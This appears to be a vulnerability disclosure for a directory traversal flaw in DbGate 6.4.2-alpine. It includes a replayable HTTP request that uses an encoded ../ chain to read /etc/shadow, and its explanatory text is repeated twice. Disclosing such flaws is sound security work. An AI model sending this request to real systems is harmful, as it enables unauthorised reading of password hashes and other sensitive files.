DbGate version 6.4.2-alpine is vulnerable to a directory traversal flaw.
The file parameter is not properly restricted to the intended uploads directory. As a result, the endpoint that lists files within the upload directory can be manipulated to access arbitrary files on the system. By supplying a crafted path to the file parameter, an attacker can read files outside the upload directory, potentially exposing sensitive system-level data.
GET /uploads/get?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow HTTP/1.1
Host: <REPLACE ME>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: <REPLACE ME>
Authorization: Bearer <REPLACE ME>
Connection: keep-alive
Cookie: <REPLACE ME>
Priority: u=4
To replay this attack the headers will need to be replaced. Due to the tokens required, the URL cannot be copied into the browser.
DbGate version 6.4.2-alpine is vulnerable to a directory traversal flaw.
The file parameter is not properly restricted to the intended uploads directory. As a result, the endpoint that lists files within the upload directory can be manipulated to access arbitrary files on the system. By supplying a crafted path to the file parameter, an attacker can read files outside the upload directory, potentially exposing sensitive system-level data.
GET Request from Burp:
To replay this attack the headers will need to be replaced. Due to the tokens required, the URL cannot be copied into the browser.